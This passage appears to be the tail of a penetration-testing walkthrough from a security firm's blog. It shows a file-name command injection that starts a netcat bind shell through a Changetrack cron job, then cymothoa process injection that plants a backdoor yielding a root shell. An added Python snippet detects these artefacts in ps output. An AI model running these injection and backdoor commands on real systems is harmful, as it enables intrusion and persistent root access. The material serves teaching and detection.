27391 ?        S      0:00 sh -c cp /home/development/<`nc -l -p 5001 -e $SHELL` /var/lib/changetrack/home:development:<`nc -l -p 5001 -e $SHELL`
27393 ?        Z      0:00 [cron]
27394 ?        S      0:00 nc -l -p 5001 -e /bin/sh
27396 ?        R      0:00 ps ax
chmod +x cymothoa
./cymothoa -p 26708 -s 0 -y 6666
[+] attaching to process 26708

register info:
-----------------------------------------------------------
eax value: 0xfffffe00   ebx value: 0xffffffff
esp value: 0xbf94de6c   eip value: 0xb7f8a410
------------------------------------------------------------

[+] new esp: 0xbf94de68
[+] injecting code into 0xb7f8b000
[+] copy general purpose registers
[+] detaching from 26708

[+] infected!!!

Nice! Now open a terminal and connect to our backdoor on port 6666.

root@bt:/pentest/backdoors/cymothoa# knockknock -p 6666 192.168.53.129
*** Success: knock sent.
root@bt:/pentest/backdoors/cymothoa# nc 192.168.53.129 6666
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/root

Remember to use a SUID process (owned by root), or you will only get a normal user
shell when running (infecting) cymothoa on a normal user process. Finish.
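From the defender’s side, the process table above is where this attack is visible. The Python snippet below is an added example (not from the write-up or any tool in it) that scans `ps ax` lines for the two artefacts left behind: a netcat listener started with `-e`, and an `sh -c cp ...` command line carrying backquote or `$(...)` substitution; the sample lines are copied from the listing above, plus one harmless control line.

```python
import os
import re

# Sample lines taken from the ps ax listing above; the "-bash" line is a benign control.
PS_SAMPLE = """\
 4933 ?        Ss     0:00 /usr/sbin/cron
 4955 ?        Ss     0:05 /usr/sbin/apache2 -k start
26708 ?        Ss     0:00 /bin/sh -c /usr/local/bin/changetrack -q
26714 ?        S      0:00 sh -c cp /home/development/<`nc -l -p 5001 -e $SHELL` /var/lib/changetrack/home:development:<`nc -l -p 5001 -e $SHELL`
26748 ?        S      0:00 nc -l -p 5001 -e /bin/sh
24859 pts/0    Ss+    0:00 -bash
"""

# ps ax columns: PID TTY STAT TIME COMMAND (COMMAND may contain spaces).
PS_LINE = re.compile(r"^\s*(?P<pid>\d+)\s+(?P<tty>\S+)\s+(?P<stat>\S+)\s+(?P<time>\S+)\s+(?P<cmd>.*)$")
# Backquote or $(...) command substitution anywhere in a command line.
SUBST = re.compile(r"`[^`]*`|\$\([^)]*\)")


def parse_ps(text):
    """Turn ps ax output into a list of {pid, stat, cmd} dicts; header and blank lines are skipped."""
    procs = []
    for line in text.splitlines():
        m = PS_LINE.match(line)
        if m:
            procs.append({"pid": int(m["pid"]), "stat": m["stat"], "cmd": m["cmd"]})
    return procs


def find_suspicious(procs):
    """Return (pid, reason, cmd) tuples for the artefacts the Changetrack abuse leaves behind."""
    findings = []
    for p in procs:
        cmd = p["cmd"]
        argv = cmd.split()
        if not argv:
            continue
        prog = os.path.basename(argv[0])
        # 1. A netcat listener that hands the accepted connection to a program.
        if prog in ("nc", "netcat", "ncat") and "-l" in argv and "-e" in argv:
            findings.append((p["pid"], "netcat listener executing a program", cmd))
        # 2. A shell -c command line containing command substitution: a sign that an
        #    untrusted string (here a file name) was pasted into a shell command.
        if prog in ("sh", "bash", "dash") and len(argv) > 1 and argv[1] == "-c" and SUBST.search(cmd):
            findings.append((p["pid"], "shell -c command line with command substitution", cmd))
    return findings


if __name__ == "__main__":
    for pid, reason, cmd in find_suspicious(parse_ps(PS_SAMPLE)):
        print(f"{pid}: {reason}: {cmd}")
```

Only the simple split-flag form (`-l` and `-e` as separate tokens, as in the listing) is recognised; combined forms such as `-le` would need a real option parser.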


About Spentera

We specialize in penetration testing, vulnerability assessment, computer forensics, as well as intrusion analysis and malware analysis. Customers can contact us directly at contact[at]spentera[dot]id, or use the Contact Our Team menu on the sidebar.